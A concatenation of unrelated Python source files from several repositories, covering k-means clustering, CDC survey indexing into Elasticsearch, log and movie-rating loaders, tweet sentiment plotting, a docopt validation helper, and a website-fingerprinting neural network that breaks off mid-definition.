return min(enumerate(iterable), key=lambda x: x[1])
class KMean:
def __init__(self, n_clusters: int):
self.n_clusters = n_clusters
self.centroids = None
self.labels = None
def init_centroids(self, n: int):
self.centroids = Matrix([
[random() for _ in range(n)] for _ in range(self.n_clusters)
])
def get_labels(self, mat: Matrix):
n = mat.get_shape()[0]
results = list()
for i in range(self.n_clusters):
temp = mat.element_substract(self.centroids.row(i).repeat_vector(n=n))
temp = temp.element_exponent().sum(axis=0).transpose()
results.append(temp.get_list()[0])
return [argmin(r)[0] for r in Matrix(results).transpose().get_list()]
def new_centroid(self, data, n):
if len(data) > 0:
return Matrix(data).mean(axis=1).get_list()[0]
else:
return [random() for _ in range(n)]
def compute_new_centroids(self, n):
self.centroids = Matrix([
self.new_centroid([c for c, label in zip(self.centroids, self.labels) if label == i], n=n) for i in range(self.n_clusters)
])
def fit(self, mat: Matrix, n_iter: int=200, tol: float=1e-9, min_iter: int=30, verbose: bool=False):
s = mat.get_shape()
self.init_centroids(s[1])
old_centroids = None
for i in range(n_iter):
self.labels = self.get_labels(mat)
self.compute_new_centroids(s[1])
if old_centroids is not None and i > min_iter and \
old_centroids.element_substract(self.centroids).element_exponent().sum() < tol:
if verbose:
print("break at step %d" % i)
break
old_centroids = self.centroids
def transform(self, mat: Matrix):
return self.get_labels(mat)
def fit_transform(self, mat: Matrix, verbose: bool=False):
self.fit(mat, verbose=verbose)
return self.transform(mat)
if __name__ == "__main__":
A = Matrix([
[1, 2, 3, 6],
[3, 10, 2, 1],
[4, 9, 1, 1],
[1, 3, 3, 5],
[1, 3, 4, 5],
[0, 3, 3, 5]
])
# PCA
pca = PCA()
pca.fit(A)
print(pca.transform(A).get_list())
# KMean
km = KMean(2)
print(km.fit_transform(A, verbose=True))
``` |
{
"source": "jp-costa/examples",
"score": 3
} |
#### File: cdc_nutrition_exercise_patterns/scripts/process_brfss_data.py
```python
import xport
import pandas as pd
import csv
import numpy as np
import re
import elasticsearch
import json
import pprint as pprint
es = elasticsearch.Elasticsearch()
# Import data and read into a dataframe
f = open('./LLCP2013.ASC', encoding='iso-8859-1')
cdc = f.read().splitlines()
t = pd.DataFrame({'Var': cdc})
# Data references:
# - Data: http://www.cdc.gov/brfss/annual_data/2013/files/LLCP2013ASC.ZIP
# - Data Codebook: http://www.cdc.gov/brfss/annual_data/2013/pdf/codebook13_llcp.pdf
# - Variable layout: http://www.cdc.gov/brfss/annual_data/2013/llcp_varlayout_13_onecolumn.html
# Each row in BRFSS data file correspondents to a respondent. The response to 321 questions is coded in
# a single 2365 character long numeric string. The variable_list.csv file contains a maps the column number
# to fields. For example, column 18-19 is a 2-digit code for the interview month
var = pd.read_csv('./variable_list.csv')
# We will only be looking at a subset of the columns in this analysis - these columns have been coded with a
# Keep = Yes value in the variable list.
varKeep = var[var['Keep'] == 'Yes']
# Decode the numeric response into feature.
for i, row in varKeep.iterrows():
st = row['Starting Column'] - 1
en = st + row['Field Length']
#print(st, en)
t[row['Variable Name']] = t['Var'].map(lambda x: x[st:en])
#print(row['Variable Name'])
# Create deep copy of variable
t1 = t.copy(deep=True)
# Function to convert datetime
from datetime import datetime
def str_to_iso(text):
if text != '':
for fmt in (['%m%d%Y','%d%m%Y']):
try:
return datetime.isoformat(datetime.strptime(text, fmt))
except ValueError:
if text == '02292014':
return datetime.isoformat(datetime.strptime('02282014', fmt))
elif text == '09312014':
return datetime.isoformat(datetime.strptime('09302014', fmt))
print(text)
pass
raise ValueError('Changing date')
else:
return None
# id to state map
st = pd.read_csv('./State.csv')
# Convert state value from string to int
t1['_STATE'] = t1['_STATE'].map(lambda x: int(x))
# Map numeric value of stateto state name
st1 = st[['ID', 'State']].set_index('ID').to_dict('dict')['State']
t1['_STATE'] = t1['_STATE'].replace(st1)
# Grab avg coordinates for state
lat = st.set_index('State')[['Latitude']].to_dict()['Latitude']
lon = st.set_index('State')[['Longitude']].to_dict()['Longitude']
t1['Latitude'] = t1['_STATE'].replace(lat)
t1['Longitude'] = t1['_STATE'].replace(lon)
# Convert interview date values into numeric
t1['FMONTH'] = t1['FMONTH'].map(lambda x: int(x))
t1['IMONTH'] = t1['IMONTH'].map(lambda x: int(x))
t1['IDAY'] = t1['IDAY'].map(lambda x: int(x))
t1['IDATE'] = t1['IDATE'].map(lambda x: str_to_iso(x))
# Alcohol consumption
t1['AVEDRNK2'] = t1['AVEDRNK2'].map(lambda x: int(x) if not str.isspace(x) else None) # drinks per occasion
t1['DRNK3GE5'] = t1['DRNK3GE5'].map(lambda x: int(x) if not str.isspace(x) else None) # binge days
t1['MAXDRNKS'] = t1['MAXDRNKS'].map(lambda x: int(x) if not str.isspace(x) else None) # max drinks per occasion in last 30 days
t1['_DRNKDY4'] = t1['_DRNKDY4'].map(lambda x: int(x) if not str.isspace(x) else None) # drinks/day
t1['_DRNKMO4'] = t1['_DRNKMO4'].map(lambda x: int(x) if not str.isspace(x) else None) # drinks/month
t1['DROCDY3_'] = t1['DROCDY3_'].map(lambda x: int(x) if not str.isspace(x) else None) # drink occasions in last 30 days
choice = {'1':'No', '2':'Yes', '9': 'Missing'}
t1['_RFBING5'] = t1['_RFBING5'].replace(choice) # binge drinker?
choice = {'1':'Yes', '2':'No', '7':'Don\'t know' , '9': 'Refused'}
t1['DRNKANY5'] = t1['DRNKANY5'].replace(choice) # any drinks in last 30 days?
# Activity & exercise
# Refer to the codebook ( http://www.cdc.gov/brfss/annual_data/2013/pdf/codebook13_llcp.pdf) for variable meaning
t1['METVL11_'] = t1['METVL11_'].map(lambda x: int(x) if not str.isspace(x) else None)/10
t1['METVL21_'] = t1['METVL21_'].map(lambda x: int(x) if not str.isspace(x) else None)/10
t1['MAXVO2_'] = t1['MAXVO2_'].map(lambda x: int(x) if not str.isspace(x) else None) / 100
t1['FC60_'] = t1['FC60_'].map(lambda x: int(x) if not str.isspace(x) else None) / 100
t1['PADUR1_'] = t1['PADUR1_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PADUR2_'] = t1['PADUR2_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PAFREQ1_'] = t1['PAFREQ1_'].map(lambda x: int(x) if not str.isspace(x) else None) / 1000
t1['PAFREQ2_'] = t1['PAFREQ2_'].map(lambda x: int(x) if not str.isspace(x) else None) / 1000
t1['STRFREQ_'] = t1['STRFREQ_'].map(lambda x: int(x) if not str.isspace(x) else None) / 1000
t1['PAMIN11_'] = t1['PAMIN11_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PAMIN21_'] = t1['PAMIN21_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PA1MIN_'] = t1['PA1MIN_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PAVIG11_'] = t1['PAVIG11_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PAVIG21_'] = t1['PAVIG21_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PA1VIGM_'] = t1['PA1VIGM_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['EXERHMM1'] = t1['EXERHMM1'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['EXERHMM2'] = t1['EXERHMM2'].map(lambda x: int(x) if not str.isspace(x) else None)
#t1['EXEROFT1'] = t1['EXEROFT1'].map(lambda x: exerFcn(x))
#t1['EXEROFT2'] = t1['EXEROFT2'].map(lambda x: exerFcn(x))
#t1['STRENGTH'] = t1['STRENGTH'].map(lambda x: exerFcn(x))
choice = {'1':'Yes', '2':'No', '7':'Don\'t know' , '9': 'Refused'}
t1['EXERANY2'] = t1['EXERANY2'].replace(choice)
choice={'1': 'Had exercise in last 30 days',
'2': 'No exercise in last 30 days',
'9': 'Don’t know/Not sure/Missing'}
t1['_TOTINDA'] = t1['_TOTINDA'].replace(choice)
choice = { '0' : 'Not Moderate / Vigorous or No Activity',
'1' : 'Moderate',
'2' : 'Vigorous'}
t1['ACTIN11_'] = t1['ACTIN11_'].replace(choice)
t1['ACTIN21_'] = t1['ACTIN21_'].replace(choice)
choice = {'1' : 'Highly Active',
'2' : 'Active',
'3' : 'Insufficiently Active',
'4' : 'Inactive',
'9' : 'Don’t know' }
t1['_PACAT1'] = t1['_PACAT1'].replace(choice)
choice = {'1' : 'Met aerobic recommendations',
'2' : 'Did not meet aerobic recommendations',
'9' : 'Don’t know' }
t1['_PAINDX1'] = t1['_PAINDX1'].replace(choice)
choice = {'1' : 'Meet muscle strengthening recommendations',
'2' : 'Did not meet muscle strengthening recommendations',
'9' : 'Missing'}
t1['_PASTRNG'] = t1['_PASTRNG'].replace(choice)
choice = {'1' : 'Met both guidelines',
'2' : 'Met aerobic guidelines only',
'3' : 'Met strengthening guidelines only',
'4' : 'Did not meet either guideline',
'9' : 'Missing' }
t1['_PAREC1'] = t1['_PAREC1'].replace(choice)
choice = {'1' : 'Met both guidelines',
'2' : 'Did not meet both guideline',
'9' : 'Missing' }
#t1['_PASTAE1'] = t1['_PASTAE1'].replace(choice)
# Map activity code to activity names
act = pd.read_csv('./activity.csv', encoding='iso-8859-1')
act['Activity'] = act['Activity'].map(lambda x: re.sub(r'\s*$','', x))
t1['EXRACT11'] = t1['EXRACT11'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['EXRACT11'] = t1['EXRACT11'].replace(act.set_index('ID').to_dict()['Activity'])
t1['EXRACT21'] = t1['EXRACT21'].map(lambda x: int(x) if not str.isspace(x) else '')
t1['EXRACT21'] = t1['EXRACT21'].replace(act.set_index('ID').to_dict()['Activity'])
# Height, Weight, Age, BMI
t1['_BMI5'] = t1['_BMI5'].map(lambda x: int(x) if not str.isspace(x) else None)/100
choice={'1': 'Underweight',
'2': 'Normal weight',
'3': 'Overweight',
'4':'Obese'}
t1['_BMI5CAT'] = t1['_BMI5CAT'].replace(choice)
# Height & Weight
t1['WTKG3'] = t1['WTKG3'].map(lambda x: int(x) if not str.isspace(x) else None)/100
t1['HTM4'] = t1['HTM4'].map(lambda x: int(x) if not str.isspace(x) else None)/100
t1['HTIN4'] = t1['HTIN4'].map(lambda x: int(x) if not str.isspace(x) else None)
# Nutrition
## NOTE: Values include two implied decimal places
# Vegetable & Fruit intake per day
t1['_FRUTSUM'] = t1['_FRUTSUM'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['_VEGESUM'] = t1['_VEGESUM'].map(lambda x: int(x) if not str.isspace(x) else None)
# Food intake - times per day
t1['FRUTDA1_'] = t1['FRUTDA1_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['VEGEDA1_'] = t1['VEGEDA1_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['GRENDAY_'] = t1['GRENDAY_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['ORNGDAY_'] = t1['ORNGDAY_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['FTJUDA1_'] = t1['FTJUDA1_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['BEANDAY_'] = t1['BEANDAY_'].map(lambda x: int(x) if not str.isspace(x) else None)
# Salt intake and advice
choice = {'1':'Yes', '2':'No', '7':'Don\'t know' , '9': 'Refused'}
t1['WTCHSALT'] = t1['WTCHSALT'].replace(choice)
t1['DRADVISE'] = t1['DRADVISE'].replace(choice)
# In[13]:
# Demographics
choice = {'1' : 'Did not graduate High School',
'2' : 'Graduated High School',
'3' : 'Attended College or Technical School',
'4' : 'Graduated from College or Technical School',
'9' : 'Don’t know/Not sure/Missing'}
t1['_EDUCAG'] = t1['_EDUCAG'].replace(choice)
choice = {'1' : 'Male',
'2' : 'Female'}
t1['SEX'] = t1['SEX'].replace(choice)
choice = {'1' : '< $15000',
'2' : '$15,000 - $25,000',
'3' : '$25,000 - $35,000',
'4' : '$35,000 - $50,000',
'5' : '> $50,000',
'9' : 'Don’t know/Not sure/Missing'}
t1['_INCOMG'] = t1['_INCOMG'].replace(choice)
choice = {'1':'Employed for wages', '2':'Self-employed', '3': 'Unemployed < 1 year', '4': 'Unemployed > 1 year', '5': 'Homemaker', '6' : 'Student', '7': 'Retired' , '8': 'Unable to work', '9': 'Refused'}
t1['EMPLOY1'] = t1['EMPLOY1'].replace(choice)
choice = {'1':'< Kindergarden', '2':'Elementary', '3': 'Some high-school', '4': 'High-school graduate', '5': 'College / tech school', '6' : 'College grade', '9': 'Refused'}
t1['EDUCA'] = t1['EDUCA'].replace(choice)
choice = {'1':'Married', '2':'Divored', '4': 'Separated', '3': 'Separated', '5': 'Never Married', '6':'Unmarried couple' , '9': 'Refused'}
t1['MARITAL'] = t1['MARITAL'].replace(choice)
choice = {'1':'Yes', '2':'No', '7':'Don\'t know' , '9': 'Refused'}
t1['VETERAN3'] = t1['VETERAN3'].replace(choice)
# Age
choice = {
'01' : 'Age 18 to 24',
'02' : 'Age 25 to 29',
'03' : 'Age 30 to 34',
'04' : 'Age 35 to 39',
'05': 'Age 40 to 44',
'06' : 'Age 45 to 49',
'07': 'Age 50 to 54',
'08': 'Age 55 to 59',
'09': 'Age 60 to 64',
'10': 'Age 65 to 69',
'11': 'Age 70 to 74',
'12': 'Age 75 to 79' ,
'13': 'Age 80 or older',
'14': 'Don’t know/Refused/Missing'}
t1['_AGEG5YR'] = t1['_AGEG5YR'].replace(choice)
# General health
choice = {'5':'Poor', '3':'Good', '1':'Excellent', '2':'Very Good', '4':'Fair', '7':'Don\'t know' , '9': 'Refused'}
t1['GENHLTH'] = t1['GENHLTH'].replace(choice)
choice = {'1':'Yes', '2':'No', '7':'Don\'t know' , '9': 'Refused'}
t1['QLACTLM2'] = t1['QLACTLM2'].replace(choice)
t1['USEEQUIP'] = t1['USEEQUIP'].replace(choice)
t1['DECIDE'] = t1['DECIDE'].replace(choice)
t1['DIFFWALK'] = t1['DIFFWALK'].replace(choice)
t1['DIFFDRES'] = t1['DIFFDRES'].replace(choice)
t1['DIFFALON'] = t1['DIFFALON'].replace(choice)
t1['MENTHLTH'] = t1['MENTHLTH'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['POORHLTH'] = t1['POORHLTH'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['SLEPTIM1'] = t1['SLEPTIM1'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PHYSHLTH'] = t1['PHYSHLTH'].map(lambda x: int(x) if not str.isspace(x) else None)
# Map variable names to more descriptive names
varDict = var[['Variable Name', 'DESC']].to_dict('split')
varDict = dict(varDict['data'])
t1.rename(columns=varDict, inplace=True)
# Replace space / special characters with underscore
t1.rename(columns=lambda x: re.sub(' ', '_', x), inplace=True)
t1.rename(columns=lambda x: re.sub(r'\(|\-|\/|\|\>|\)|\#', '', x), inplace=True)
t1.rename(columns=lambda x: re.sub(r'\>', 'GT', x), inplace=True)
# Delete original row
del(t1['Var'])
t1.fillna('', inplace=True)
### Create and configure Elasticsearch index
# Name of index and document type
index_name = 'brfss';
doc_name = 'respondent'
# Delete donorschoose index if one does exist
if es.indices.exists(index_name):
es.indices.delete(index_name)
# Create donorschoose index
es.indices.create(index_name)
# Add mapping
with open('brfss_mapping.json') as json_mapping:
d = json.load(json_mapping)
es.indices.put_mapping(index=index_name, doc_type=doc_name, body=d)
### Index Data into Elasticsearch
for subj_id, subject in t1.iterrows():
if subj_id % 1000 == 0:
print(subj_id)
thisResp = subject.to_dict()
thisResp['Coordinates'] = [thisResp['Longitude'], thisResp['Latitude']]
thisDoc = json.dumps(thisResp);
#pprint.pprint(thisDoc)
# write to elasticsearch
es.index(index=index_name, doc_type=doc_name, id=subj_id, body=thisDoc)
```
#### File: Graph/apache_logs_security_analysis/download_data.py
```python
import datetime,requests,gzip,shutil,os,argparse
from dateutil.relativedelta import *
from dateutil import parser as date_parser
parser = argparse.ArgumentParser(description='Download Secrepo Logs')
parser.add_argument('--start_date', dest="start_date", default="2015-01-17",help='start date')
parser.add_argument('--output_folder', dest="output_folder", default="./data",help='output folder')
parser.add_argument('--overwrite', dest="overwrite",type=bool, default=False,help='overwrite previous files')
args = parser.parse_args()
base_url="http://www.secrepo.com/self.logs/%s"
base_filename="access.log.%s.gz"
end_date = datetime.date.today()
output_folder=args.output_folder
current_date = date_parser.parse(args.start_date)
def download_file(url,filename):
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(filename, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
return filename
print("Received %s code for %s"%(r.status_code,url))
return None
def extract(filename,overwrite):
#only extract if it doesn't exist
output_file=output_folder+'/'+(os.path.splitext(filename)[0])
if not os.path.exists(output_file) or overwrite:
print ("Extracting file %s"%filename)
with gzip.open(filename, 'rb') as f_in, open(output_file, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
else:
print("Skipping Extraction File Exists")
if not os.path.exists(output_folder):
os.mkdir(output_folder)
while current_date.date() < end_date:
filename=base_filename%current_date.strftime('%Y-%m-%d')
url = base_url%filename
print("Downloading %s"%url)
filename = download_file(url,filename)
if filename:
extract(filename,overwrite=args.overwrite)
os.remove(filename)
else:
print("Could not download %s. Skipping."%url)
current_date = current_date+relativedelta(days=+1)
```
#### File: Graph/movie_recommendations/index_ratings.py
```python
import csv
from collections import deque
import elasticsearch
from elasticsearch import helpers
es = elasticsearch.Elasticsearch(http_auth=('elastic', 'changeme'))
movies_file = "./data/ml-20m/movies.csv"
ratings_file = "./data/ml-20m/ratings.csv"
mapping_file = "movie_recommendations.json"
def read_movies(filename):
movie_dict = dict()
with open(filename, encoding="utf-8") as f:
f.seek(0)
for x, row in enumerate(csv.DictReader(f, delimiter=',' ,quotechar='"' ,quoting=csv.QUOTE_MINIMAL)):
movie={'title':row['title'],'genres':row['genres'].split('|')}
t = row['title']
try:
year = int((row['title'][t.rfind("(") + 1: t.rfind(")")]).replace("-", ""))
if year <= 2016 and year > 1900:
movie['year'] = year
except:
pass
movie_dict[row["movieId"]]=movie
return movie_dict
def read_ratings(filename,movies):
with open(filename, encoding="utf-8") as f:
f.seek(0)
num_ratings=0
for x, row in enumerate(csv.DictReader(f, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)):
row.update(movies[row["movieId"]])
num_ratings += 1
if num_ratings % 100000 == 0:
print("Indexed %s ratings" % (num_ratings))
yield row
es.indices.delete(index="movie_lens_ratings",ignore=404)
es.indices.create(index="movie_lens_ratings", body=open(mapping_file,"r").read(), ignore=404)
print("Indexing ratings...")
deque(helpers.parallel_bulk(es,read_ratings(ratings_file,read_movies(movies_file)),index="movie_lens_ratings",doc_type="rating"), maxlen=0)
print ("Indexing Complete")
es.indices.refresh()
``` |
{
"source": "jpcrespo/twanalysis",
"score": 3
} |
#### File: twanalysis/app/sentiment.py
```python
import stanza, re, csv, os
import pandas as pd
from pysentimiento import create_analyzer
import matplotlib.pyplot as plt
from matplotlib import font_manager as fm, rcParams
import matplotlib.dates as mdates
from datetime import datetime, timedelta
nlp = stanza.Pipeline(lang='es');
analyzer = create_analyzer(task="sentiment", lang="es");
def tokenizar(mensaje):
''' Al obtener una frase elimina numeros simbolos links
SOLO devúelve el mensaje limpio'''
doc = nlp(mensaje);
#recuperamos todos los textos
word_tokens = [token.text.lower() for sent in doc.sentences for token in sent.words]
#ahora debemos limpiar simbolos, links, numeros.
link = [re.sub('http\S+','',word) for word in word_tokens]
signs = '[/#@\'!"$%&()*+,-.:\;<=>?^_`{|}~]\\...'
link_signs = [re.sub(signs,'',word) for word in link]
link_signs_num = [re.sub('\d+','',word) for word in link_signs]
emoji_pattern = re.compile("["
u"\U0001F49A-\U000E007F" "]+", flags=re.UNICODE)
link_signs_num_e = [re.sub(emoji_pattern,'',word) for word in link_signs_num]
clean=[]
for i,word in enumerate(link_signs_num_e):
if not word == '':
clean.append(word)
return clean
def data_sentiment(target):
dataset = pd.read_csv('resultados/'+target+'.csv')
tw_text = dataset.iloc[:,2].values
x_time = pd.to_datetime(dataset.iloc[:,1].values)
x_time = [x.strftime('%Y/%m/%d') for x in x_time]
x_time = [datetime.strptime(x,'%Y/%m/%d') for x in x_time]
sentiment = []
for text in tw_text:
token = tokenizar(text)
mss=''
for x in token:
mss+=x
mss=mss+' '
resp = analyzer.predict(mss)
if(resp.output == 'NEG'):
sentiment.append(1+resp.probas[resp.output])
elif(resp.output == 'POS'):
sentiment.append(1-resp.probas[resp.output])
else: sentiment.append(1)
with open('resultados/'+target+'_sent.csv','w',newline='\n') as file:
spw = csv.writer(file, delimiter=',')
spw.writerow(['fecha','dato'])
for x in zip(x_time[::-1],sentiment[::-1]):
spw.writerow(x)
df1=pd.read_csv('resultados/'+target+'_sent.csv',sep=',').sort_values(by='fecha').set_index('fecha')
#cnt1 = df1.rolling(7,min_periods=1).mean()
cnt = df1.rolling(28,min_periods=7).mean().iloc[:,:].values
#date = df1.index.values
x_time = pd.to_datetime(dataset.iloc[:,1].values)
x_time = [x.strftime('%Y/%m/%d') for x in x_time]
date = [datetime.strptime(i,'%Y/%m/%d') for i in x_time]
fpath = os.path.join('app/MonoLisa.ttf')
prop = fm.FontProperties(fname=fpath)
fname = os.path.split(fpath)[1]
colores = [(192, 192, 192), #color (fondo)
(0,0,0), #color letras
(230,230,230), #color semi blanco (2do fondo)
(25,25,112)] #color graf
for i in range(len(colores)):
r, g, b = colores[i]
colores[i] = (r / 255., g / 255., b / 255.)
fig = plt.figure(figsize=(21,7),constrained_layout=True)
ax = plt.axes()
fig.patch.set_facecolor(colores[0])
ax.patch.set_facecolor(colores[2])
text_sets = {'color': colores[1],'weight': 'normal','size': 25,'fontproperties':prop}
plt.title('\nAnálisis sentimiento en el tiempo\n',fontsize=35,fontdict=text_sets)
plt.ylabel('\nSentimiento\n',fontdict=text_sets)
plt.xlabel('\nFecha\n',fontdict=text_sets)
plt.plot(date,cnt,linewidth=2,color=colores[3])
locator = mdates.AutoDateLocator(minticks=20, maxticks=30)
formatter = mdates.ConciseDateFormatter(locator)
ax.xaxis.set_major_locator(locator)
ax.xaxis.set_major_formatter(formatter)
plt.yticks(fontsize=15,fontproperties=prop,color=colores[1]);
plt.xticks(fontsize=18,rotation=0,fontproperties=prop,color=colores[1]);
#plt.gca().yaxis.grid(linestyle='--',linewidth=0.8,dashes=(5,15))
plt.gca().xaxis.grid(linestyle='--',linewidth=0.5,dashes=(8,10))
plt.text(date[-8],cnt[-1],' @'+target+' ',fontsize=20,fontproperties=prop,color=colores[3])
plt.gca().spines["top"].set_visible(False)
plt.gca().spines["bottom"].set_visible(True)
plt.gca().spines["right"].set_visible(False)
plt.gca().spines["left"].set_visible(True)
plt.ylim([0,2])
plt.xlim([date[0],date[-1]])
plt.axhline(1,color='azure') #horizontal line
ax.axhspan(0,1, facecolor='tomato', alpha=0.05)
ax.axhspan(1,2, facecolor='lime', alpha=0.05)
plt.text(date[-13],0.75,'Sentimiento\nNeutro',fontsize=13,fontproperties=prop,color='black')
plt.text(date[5],1.75,'Sentimiento\nPositivo',fontsize=13,fontproperties=prop,color='green')
plt.text(date[5],0.25,'Sentimiento\nNegativo',fontsize=13,fontproperties=prop,color='red')
plt.savefig('resultados/'+target+'_sent.png')
#os.remove('resultados/'+target+'_sent.csv')
``` |
{
"source": "jpcsmith/doceasy",
"score": 3
} |
#### File: jpcsmith/doceasy/doceasy.py
```python
import sys
import csv
import typing
from typing import IO
from docopt import docopt
from schema import (
SchemaError, And, Schema, Regex, Optional, Use, Forbidden, Const,
Literal, Or
)
__all__ = [
'Schema', 'And', 'Or', 'Regex', 'Optional', 'Use', 'Forbidden',
'Const', 'Literal', 'PositiveInt', 'positive_int', 'AtLeast', 'doceasy',
'CsvFile',
]
PositiveInt = And(Use(int), lambda n: n >= 1,
error="Value should be an integer and at least 1")
def positive_int(value: str):
"""Extracts a positive integer from a string.
Raises ValueError if the string does not contain a positive integer.
"""
integer = int(value)
if integer < 1:
raise ValueError(f"invalid literal for a positive integer: '{value}'")
return integer
class AtLeast:
"""Validator to ensure that the argument is at least the value
specified in the constructor.
"""
def __init__(self, min_value):
self.min_value = min_value
def validate(self, value):
"""Attempt to validate the provided value."""
if value < self.min_value:
raise SchemaError(f"The value should be at least {self.min_value}")
return value
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, str(self.min_value))
class Mapping:
"""Validator that creates mappings.
The parameters kt_callable and vt_callable if provided should be
callables, such as "int", returning the desired type. If only
kt_callable is provided it is used to conver the value in the
mapping. If both are provided kt_callable converts the key and
vt_callable converts the value.
"""
def __init__(self, kt_callable=None, vt_callable=None):
if vt_callable is None:
self._kt_callable = str
self._vt_callable = kt_callable or str
else:
assert kt_callable is not None
self._kt_callable = kt_callable
self._vt_callable = vt_callable
def validate(self, map_string: str) -> typing.Dict[str, typing.Any]:
"""Validate and extract the mapping."""
try:
items = [key_val.split("=", maxsplit=1)
for key_val in map_string.split(",")]
return {self._kt_callable(key): self._vt_callable(value)
for key, value in items}
except ValueError as err:
raise SchemaError(
f"Invalid mapping string for callables {map_string}") from err
@staticmethod
def to_string(mapping) -> str:
"""Convert the mapping to a string parsable by a Mapping
validator.
"""
return ",".join(f"{key}={value}" for key, value in mapping.items())
class File:
"""Validator that creates file objects for command line files or '-'.
"""
def __init__(self, mode: str = 'r', default: typing.Optional[str] = None):
self.mode = mode
self.default = default
def validate(self, filename: typing.Optional[str]) -> IO:
"""Validate the filename and return the associated file object."""
filename = filename or self.default
stdout = sys.stdout.buffer if 'b' in self.mode else sys.stdout
stdin = sys.stdin.buffer if 'b' in self.mode else sys.stdin
if filename == '-':
if any(m in self.mode for m in ['w', 'a', 'x']):
return stdout # type: ignore
return stdin # type: ignore
if filename is None:
raise SchemaError("Invalid object to create a file: '{filename}'")
try:
return open(filename, mode=self.mode)
except Exception as err:
raise SchemaError(str(err)) from err
class CsvFile(File):
"""Validate and create a csv input/output file.
If dict_args is not None, a DictReader/-Writer will be created.
"""
def __init__(self, *args, dict_args: dict = None, **kwargs):
super().__init__(*args, **kwargs)
self.dict_args = dict_args
def validate(self, filename: typing.Optional[str]):
stream = super().validate(filename)
if any(m in self.mode for m in ['w', 'a', 'x']):
if self.dict_args is not None:
return csv.DictWriter(stream, **self.dict_args)
return csv.writer(stream)
if self.dict_args is not None:
return csv.DictReader(stream, **self.dict_args)
return csv.reader(stream)
def _validate(arguments: dict, schema: Schema) -> dict:
try:
return schema.validate(arguments)
except SchemaError as err:
sys.exit(f"Invalid argument: {err}")
def _rename_arguments(arguments: dict):
return {
key.lower().strip('-').replace('-', '_'): value
for key, value in arguments.items()
}
def doceasy(
docstring: str,
schema: typing.Union[Schema, typing.Dict, None] = None,
rename: bool = True, **kwargs
) -> dict:
"""Parse the command line arguments."""
arguments = docopt(docstring, **kwargs)
if isinstance(schema, dict):
schema = Schema(schema)
if schema is not None:
arguments = _validate(arguments, schema)
if rename:
arguments = _rename_arguments(arguments)
return arguments
``` |
{
"source": "jpcsmith/wf-tools",
"score": 3
} |
#### File: lab/classifiers/dfnet.py
```python
from tensorflow.compat.v1 import keras
from tensorflow.compat.v1.keras import layers, initializers
from lab.classifiers.wrappers import ModifiedKerasClassifier
def build_model(n_features: int, n_classes: int):
"""Create and return the DeepFingerprinting Model."""
model = keras.Sequential()
# Block1
filter_num = ['None', 32, 64, 128, 256]
kernel_size = ['None', 8, 8, 8, 8]
conv_stride_size = ['None', 1, 1, 1, 1]
pool_stride_size = ['None', 4, 4, 4, 4]
pool_size = ['None', 8, 8, 8, 8]
model.add(layers.Reshape((n_features, 1), input_shape=(n_features,)))
model.add(layers.Conv1D(
filters=filter_num[1], kernel_size=kernel_size[1],
strides=conv_stride_size[1], padding='same', name='block1_conv1'))
model.add(layers.BatchNormalization(axis=-1))
model.add(layers.ELU(alpha=1.0, name='block1_adv_act1'))
model.add(layers.Conv1D(
filters=filter_num[1], kernel_size=kernel_size[1],
strides=conv_stride_size[1], padding='same', name='block1_conv2'))
model.add(layers.BatchNormalization(axis=-1))
model.add(layers.ELU(alpha=1.0, name='block1_adv_act2'))
model.add(layers.MaxPooling1D(
pool_size=pool_size[1], strides=pool_stride_size[1], padding='same',
name='block1_pool'))
model.add(layers.Dropout(0.1, name='block1_dropout'))
model.add(layers.Conv1D(
filters=filter_num[2], kernel_size=kernel_size[2],
strides=conv_stride_size[2], padding='same', name='block2_conv1'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='block2_act1'))
model.add(layers.Conv1D(
filters=filter_num[2], kernel_size=kernel_size[2],
strides=conv_stride_size[2], padding='same', name='block2_conv2'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='block2_act2'))
model.add(layers.MaxPooling1D(
pool_size=pool_size[2], strides=pool_stride_size[3], padding='same',
name='block2_pool'))
model.add(layers.Dropout(0.1, name='block2_dropout'))
model.add(layers.Conv1D(
filters=filter_num[3], kernel_size=kernel_size[3],
strides=conv_stride_size[3], padding='same', name='block3_conv1'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='block3_act1'))
model.add(layers.Conv1D(
filters=filter_num[3], kernel_size=kernel_size[3],
strides=conv_stride_size[3], padding='same', name='block3_conv2'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='block3_act2'))
model.add(layers.MaxPooling1D(
pool_size=pool_size[3], strides=pool_stride_size[3], padding='same',
name='block3_pool'))
model.add(layers.Dropout(0.1, name='block3_dropout'))
model.add(layers.Conv1D(
filters=filter_num[4], kernel_size=kernel_size[4],
strides=conv_stride_size[4], padding='same', name='block4_conv1'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='block4_act1'))
model.add(layers.Conv1D(
filters=filter_num[4], kernel_size=kernel_size[4],
strides=conv_stride_size[4], padding='same', name='block4_conv2'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='block4_act2'))
model.add(layers.MaxPooling1D(
pool_size=pool_size[4], strides=pool_stride_size[4], padding='same',
name='block4_pool'))
